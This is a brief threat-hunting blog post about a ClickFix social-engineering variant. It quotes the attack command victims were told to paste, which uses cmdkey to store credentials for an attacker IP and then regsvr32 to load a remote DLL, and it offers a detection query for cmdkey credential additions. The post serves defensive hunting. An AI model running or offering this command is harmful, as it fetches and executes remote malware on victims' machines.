390. A New ClickFix Variant Abuses Cmdkey
Hello everyone!
Today we’re going to look at another interesting variation of the Malicious Copy and Paste technique (T1204.004).
This time, according to the report, the attackers prompted the victim to run the following command:
C:\WINDOWS\system32\cmd.exe /c
cmdkey /add:151.245.195[.]142 /user:guest &&
start regsvr32 /s \\151.245.195[.]142\hi\demo.dll &
REM I am not a robot – Cloudflare ID: d7f5a3335794c434
As you can see, before registering a malicious library from a remote server using regsvr32.exe, the attackers use cmdkey.exe to store credentials for accessing that server.
And yes, abusing cmdkey.exe can be a good hunting opportunity - we can look for suspicious events where credentials are added to the Windows Credential Manager:
event_type: "processcreatewin"
AND
proc_file_path: "cmdkey.exe"
AND
cmdline: "add"
See you soon!

Comments
Post a Comment